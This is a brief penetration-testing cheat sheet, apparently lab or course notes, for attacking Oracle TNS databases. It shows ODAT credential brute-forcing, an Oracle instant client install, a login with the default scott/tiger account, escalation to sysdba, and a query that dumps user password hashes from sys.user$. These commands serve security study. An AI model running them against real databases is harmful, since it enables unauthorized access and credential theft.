TNS Oracle
ODAT
ODAT: Oracle Database Attacking Tool
You can install it from sources but requirements
“all” will try user/password combo on enumerated services
./odat-libc2.17-x86_64 all -s 10.129.205.19
SQL PLUS
Install
sudo mkdir -p /opt/oracle
sudo chown user: /opt/oracle
cd /opt/oracle
wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-basic-linux.x64-21.4.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip
unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
export LD_LIBRARY_PATH=/opt/oracle/instantclient_21_4:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
# Connect to XE as scott
/opt/oracle/instantclient_21_4/sqlplus scott/tiger@10.129.205.19/XE
# Connect to XE as sysdba using scott creds
/opt/oracle/instantclient_21_4/sqlplus scott/tiger@10.129.205.19/XE as sysdba
# Get privs
select * from user_role_privs;
# List users and hashes
select name, password from sys.user$;